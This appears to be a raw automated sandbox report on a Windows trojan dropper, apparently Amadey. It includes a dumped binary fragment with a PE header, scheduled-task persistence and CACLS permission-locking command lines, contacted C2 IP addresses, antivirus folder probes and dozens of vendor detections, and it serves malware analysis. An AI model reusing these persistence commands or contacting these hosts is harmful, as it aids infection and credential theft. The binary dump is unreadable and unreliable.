!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†§Æɼð" 0'Ì @  `… \ ì H.text'Ì Î `.rsrc\ Ð@@HXr¶û^$½i)nÆÕgI¡Ë~‚Œ$sÃÁ{®Ô+Þxz:åîðê*„äڃfèµJ™~†“¼+»Ne‘„p¢§Çkdðjó—êŽðš&˜Ýt0;¸˜#o _0&§8%¤VÔ^Ð)û_úZ Áï…ág ìGäà㚞0º{—d((7eAž‰üY¯ö>r:U륞s f„³˜sEn"*õJ"‹óÒ0>n¹½&ŸÅ³&ÇØAÓêu^T5>\£æ@›W&ü?d»•´ÓR"9rK˜"¡§q”XßüºV»Ž¾dÇá&»Za&ÁÈ਍ִ°Ï î`Š{á<XZí7¥y{'Úd‘Wákôû*eôï "þÕ&òkåîðê*„äڃfèµJ™~åîðê*„äڃfèµJ™~åîðê*„äڃfèµJ™~åîðê*„äڃfèµJ™~åîðê*„äڃfèµJ™~æ!”:!¹ºBf›A–Ð » ŸLó¶Ùkƒ‡RFÖJðí S­Htq`-øÛ©¶Âv[ _B÷ϖEY•[ÑYÒfJ’;þkm“38®WYßÑÏ·7˜å¿ Á¥JœHс0;l“¬2ýu]ÿåîðê*„äڃfèµJ™~åîðê*„äڃfèµJ™~ë’=Gw¹ÍÍÇÂYÐýðq§@fÈçÕ´Ã>Q5åîðê*„äڃfèµJ™~åîðê*„äڃfèµJ™~˜L~sþu{¯–*ßcÀD}ñZáí´ð5ÁØbmuÅYÛx—MY1S¸ÎWóp²ãá~üð‘Ý4>=ÑrmЫU@UÚf8ܪe}»§ã+2•5@…jJ=Ñhê+W2c?¶DZÇMÎЪnÐ=äè4ÚÙ@óÏÒ?]C¹—ÝÎæ²y…»dzÄghñ¥úùûbAP¶ófÿïj¡ãÅò²9 Ìd¸[j‰ ”ûu¢jÝ Ê¿Ž•ŠP×:à3ã»Ï=îьØê‹1/iòñ«n¥/þ|ÚS xA2 tф1aÄ'm?ê”4°K›†NzA ÆÛ§æxBbY°µ€´êÇå@fP×-¤mÎʑ á¯-0q”ÿ`ßaŠ•CëËSfäth¯MÇÓ$ËDÁMÜ¿¼Åi3‹JíXÏç°2W\ÐúV6?ð2Óãèf’Ô# b~n·dWúþùËËfhÎ1øö½ÌžUùñ¹çÑD™ý7…±@¡½¿æVãÏ8ÊmÑ/à:áO´àx%ù¾Ó‹NáJôoh‹ùìUósDíHN_±ÎºþFFÚ² ÜÈç>v‘v_öÍQDØÔú ƒç™òŠ _vÌ^úSW½¬¾—<KAê™ll³¤·îäöݞ#ˆ³9ÀƒAµÎ%»xؐž¼âÚkgœa姯‹óáÙaÎj M- (Ä« @å  Gfæ}mÇ (þ›eŠÅ¯ašDãþiûW9¬¾Fgƒ1ÜW¿½ÀFlCu‹f-w,Œª~A^Ž…W—­ùRT,eÝhv/ö³ÛIÎJ2ÂÊzY·ÊÔ¥:túyû3õ·tP©Ð³ Ü­„ì®=¾lAÆýø؝"uŸTcÂî1ÁH„€ê q/öµÑÇFï…Z½  6>̜ç\ÂA­_FcŽªlüȜv6K×Ìø3¨{ˆ,qwÁ›ì,·™ ›GYG Ï ¾6hez£§¦1¸Ë°ÛÔ]L¿v,&BÐÄùÐÎçÓôv¿wR7Ã?ýˌÒÌÎåƛâ>ˆ"7ÍZüÞªäGrð)‚˜—ă˜Ldu$2sÔ֖õm]c"«½½Ë«;/T))܅:ðNKÛ{„Rè“M<åSR˜õk À5üµí°OT6ÉÞ7*#ÏåÞJKæÁb ã.@SeîLš~go_^†SÝ÷þЀ_ŒBßõØ¢Rô¨\LfÈDVÂ}¥ß*ý ?–NdºaŠjq¯jã.¸#™BSw¦$[6# ¯c•Û²±P%†5¿Mn•ãÛ[Öà¸ÛúãðüÚÌI}.r3PÖ+ÕôØþb{ËÈñ lά(!Ҙ¸ž˜›$lbæ×/ÚȔd9]TtŔ5GîǘK-܇ë|wË4·¶ý šáym àŒ¶ <¼cÁò&ÁÓ^þæÝIˆ7?—‘PÕfª²ÛÜƔ•$¬i<q_Ô,·½À_¤zóh0äs…U¾KIÓ 7\Á ü Ÿò꧕$ò^‹=^/2/¸¼Ï!¿Û*Veµ À÷¶µö$CdÚ¼ïÀ…Ê aú÷]Z¢×…Ÿb í´yûÀü“ÿföŠVˆéö±´9«JÂþê°mŸéÍS²›Žj°jxÍ©mÐwÔiî£ó^lBf‰ò67¥¶z =žCa†ðh(y 'ɬ6¯A´Zª_CÞ-uh[?Y+m=–ýð‡UŽïœyö-!â”/E,¤K,q?P‘ËÏ7CR½ƒÅ˜Ëñ¦¸!¦:dYËïYàQ͵ųL Ɯ¨ŒT†Ümò•y‘v:ŸE¯¨€oƒø›!@Ÿ÷!‹{ò©1ÿ²3œ³\Ô /¾ØõŒ~Àñ,,à"`\üŸ.©³¶&WÚl“0Þ>Ñ -ß߯BÐ,ІœVàš²B[œìUCËiHÊýémŸÏÄ>·ÁDsm´órâ§i'ú~ñé‡ëk ë-‡@•*I5ôl$T&û}#ìÙyJ¨íÔw›–›á¯„˜¥iµ¥ýwkÄõ,(­—¹œA½6¦¾ŽŒ %ó©¹b¯ËÔȑrä±çt;®J¿1Þ}oŠ4iB'º s±~ñvμ®½I‰€•Å>­|ñHÉʨDNÚò«M(ÿu›þkê.[HºÚ>Vz²:Àë &ë n?ù˜ˆGå'ˆwçw™ý¿6~Toê4n_d9“ªØ;Ó£Ié¡>b[*§ïÇ#šÏ ƒmÉ>üÂÎÓóÑH° ·™U{Ž‘ÊAò„ñ‚ÀóäÜë¹Ömfè»È2Ûô=pݑ;áÆÓƌõW\MYVBð•ßw+ÍY0ŠqžZY[ÉÕ~ËÀö%NÈ „D“DÜî îwiì{¢ÝÃ˯¶¯*䨫ØCÃÙ#”²¸dwŽ>EßυD(ŽgFäé I›½¸0\õ7¢7æ9°úœÔÎvþŒõ[3Š¨ш¶5OGRó+¤X«h* Ž¿ì2¿d]ËÔ÷Ty™5ô7(̤ˆªuáŸ:h·»ül™ìƒ[ V~ò2Ö9ØÕXŒË÷@Zɍ^@è ¿›w§u½§³ÆL[Òzþ½+È ?De{,OӂOÅO Æg=àx/œ%ÍVyæêX´Àè! !„%Ÿ ʾՁ‚t¥c¯ö» ×Ó@Àԋê<ŧF†ÈüB½ 4ª]æˆÅ8â§ÜÂav)ô^‡aØ×õa ²ƒ Ûfê?U.&¬X¾£\RÙ ¾/æÓo"6ôëC ™Æh:ó+rTÛ ÷­gÝàN µ_› µ«¨¯l¾G¥5p]¹›Ê¥:(ˆj©…*՘ÃDü(æx Ô—kÆî­`nOð–ªûq»ÂF¢c¾ù2O ¢± }ˆ_8&0†¤e‡ô lfŠÔ„nGLBþ¤Rµ”V!÷—Áû²o\°mŒt M2ƒ´ÛZ)ÂxNj«‹V¡2ÓQ‰·4¨ $¿/¢^ÞÍ ¶p³ÔÚJ†07>|6f7 1î]ˆ²ŠW°¤?’œÉTüÐÄ©êšMo®yû ø'›4x3EkHŠf ×aDxé^WkHQ­Ã3cLH5Hu›¦Íú´%·p ½Ý˜E¤¶ÇyÞägÖ¬¦C$Çú6j>DGa¾ÅõI·„³¡wà©\µÏ>ë½y_ 6¯Tì֞†¯+æJ¡'pƒÑ‡%vË0{kÑòÅæ$úô-~Ô¹˜÷ø ¹º²w¨X­Òô=!}m/|fcÇ広)‡g(„é·}ƒ˜„°¸,Q¹L µ|ß°sõ8Õ*¡ ¶†Ó ΐèº$ѱ5¢Œ1Dz[‘-©)X•fw‡¤ŒÇü®Oó½>ÔQ֕û—“€½ÅòžÉq£‘ˆÆb­¥ÚU  ‹ØHM49‚\O<L ¸vçVÑ`z<ûѹÎlªG}*§AÉaˆ°—¿å“ ÂÀ‰£2ýἓ øÜ¿ïeç[ù…‡sSx0"Ww|â°Ô a,íúÒÞcc¾sÓ(Р¯è;"y9ø¬H…$'|‰7¼s'ñV˪–ä.]¢¢ŒØ LXÑ; µË{£ŽÊ¿±}ÑÙÊ#w!N¢ºñÄ'¦«oX`勸Û[õäáFwðÆÉïD´´m@¯-es–Ôcºë5ÖÅø“Cj\åoæܪæ\?äMr./ôiÜ>þ«ÜŒ¢)+¡€àhp ǕŒD RÜ3]¸—•FƸëR¬Ì^âük‘Úí*`ë'SãŽ°“îӑÊÖrk´øE¤k9 'ÖsDž½:ŸåX¯e }Ó·2¦
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00092200', u'virtual_address': u'0x00002000', u'entropy': 7.6509165214488, u'name': u'.rdata', u'virtual_size': u'0x00092073'} entropy 7.65091652145 description A section with a high entropy has been found
entropy 0.994893617021 description Overall entropy of this PE file is high
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
host 45.9.74.80
host 5.42.65.80
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline CACLS "..\207aa4515d" /P "test22:R" /E
cmdline CACLS "..\207aa4515d" /P "test22:N"
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Stealer.12!c
DrWeb Trojan.PWS.Stealer.35404
Cynet Malicious (score: 100)
CAT-QuickHeal TjnDroppr.Dapato.S28495190
McAfee GenericRXTU-AS!58BC43389C3E
Malwarebytes Trojan.Injector
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005a7a3c1 )
Alibaba TrojanDropper:Win32/Dapato.1e314a44
K7GW Trojan ( 005a7a3c1 )
Cybereason malicious.89c3e7
Arcabit Trojan.Razy.DE2571
BitDefenderTheta Gen:NN.ZexaF.36662.KqW@aKmNgYbi
Cyren W32/Lazy.U.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDropper.Agent.SRM
APEX Malicious
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
BitDefender Gen:Variant.Razy.927089
MicroWorld-eScan Gen:Variant.Razy.927089
Avast Win32:Evo-gen [Trj]
Tencent Win32.Trojan-Spy.Stealer.Mqil
Emsisoft Gen:Variant.Razy.927089 (B)
F-Secure Trojan.TR/Dropper.Gen
VIPRE Gen:Variant.Razy.927089
TrendMicro Trojan.Win32.PRIVATELOADER.YXDIBZ
McAfee-GW-Edition BehavesLike.Win32.Generic.hc
Trapmine malicious.high.ml.score
FireEye Generic.mg.58bc43389c3e720c
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Avira TR/Dropper.Gen
Antiy-AVL Trojan[Spy]/Win32.Stealer
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:Win32/Amadey.AMY!MTB
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
GData Win32.Trojan.PSE.102OIFV
Google Detected
AhnLab-V3 Trojan/Win.Generic.R497632
VBA32 BScope.Trojan.Nitol
ALYac Gen:Variant.Razy.927089
MAX malware (ai score=80)
Cylance unsafe
Panda Trj/Genetic.gen
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXDIBZ
Rising Backdoor.DcRat!8.129D9 (TFE:1:BNER4NzZWDL)
Ikarus Trojan.Win32.Tnega
Fortinet W32/Tiny.NFR!tr